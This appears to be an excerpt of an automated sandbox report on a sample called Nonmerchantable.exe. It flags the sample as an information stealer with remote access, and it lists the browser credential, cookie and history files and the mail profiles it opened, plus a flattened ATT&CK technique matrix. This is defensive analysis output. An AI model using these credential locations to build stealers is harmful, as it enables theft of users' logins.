            Source: C:\Users\user\Desktop\Nonmerchantable.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.3964116665.0000000038882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nonmerchantable.exe PID: 3236, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: 00000005.00000002.4201739054.0000000036268000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nonmerchantable.exe PID: 3236, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.4201739054.0000000036161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.3964116665.0000000038882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4201739054.00000000362DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Nonmerchantable.exe PID: 3236, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            12
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets14
            File and Directory Discovery
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.